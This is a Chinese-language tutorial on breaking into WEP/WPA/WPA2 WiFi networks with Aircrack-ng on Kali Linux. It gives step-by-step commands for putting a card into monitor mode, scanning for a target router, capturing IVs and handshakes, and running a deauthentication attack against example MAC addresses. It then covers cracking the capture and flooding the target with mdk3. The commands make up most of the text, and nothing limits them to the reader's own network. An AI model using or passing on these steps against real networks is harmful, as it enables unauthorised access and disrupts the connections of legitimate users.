##通过字典(暴力)破解WIFI密码##
简单破解wep/wpa/wpa2加密的wifi密码,平台kali-Linux,工具为Aircrack-ng
破解过程是通过抓取正确密码的握手包(链接wifi的时候的互相交换报文),从 抓取到的握手包里找wifi密码;wep加密的wifi,可以通过足够多的报文根据算法 算出密码,所以wep的加密算法较弱;如果是wpa/wpa2的wifi,是不可能直接计算 出密码的,需要准备足够强大的密码,通过算法比对握手包里的密码和密码字典, 从而试出密码……
###wep加密的wifi步骤###
通过以下两个命令加载无线网卡,和激活网卡到监听模式monitor:
airmon-ng wlan0 up #加载无线网卡
airmon-ng start wlan0 #激活网卡
airmon-ng wlan0 down #去加载网卡
激活网卡之后输入:
airodump-ng mon0 #探测要攻击的目标主机,按ctrl+z 停止探测
可以看到路由器的名字,mac地址,信号电平,CH,MB,加密方式(wpa/wpa2/wep)等 以及客户端到路由器的连接包 选中要攻击的路由器为目标,记住它的mac地址例如6C:E8:73:48:A8:FC,以及连接 到该路由器客户端的mac地址,例如:78:F7:BE:4A:82:81, 以及CH号,例如CH为1
然后输入如下命令开始抓包:
airodump-ng –ivs -w abc -c 1 mon0 #–ivs是通过ivs过滤,只保留可以破解密码的报文.ivs文件,这样比较快点;-w #是将抓取的报文写入命名为abc并保存(之后会在当前文件夹保存为abc-01.ivs); #-c后面跟频道,如这里的1 。
然后新开一个终端窗口,对目标主机进行deauth攻击,以加速抓吧,命令格式为 aireplay-ng -0 大小 -a 目标主机mac -c 客户端mac mon0
aireplay-ng -0 10 -a 6C:E8:73:48:A8:FC -c 78:F7:BE:4A:82:81 mon0
接下来再开一个终端窗口,输入:
aircrack-ng abc-01.ivs 然后输入要破解的无线网络序号开始破解密码!此过程中可以看到抓取的报文的数量, 一般当报文数量大于2W就可以直接出来了。
如果破解过程中出现的报文少而等待报文的情况,直到达到要求开始破解,可以 使用mdk3工具对目标进行洪水验证攻击,命令如下:
mdk3 mon0 a -a 目标主机mac
[]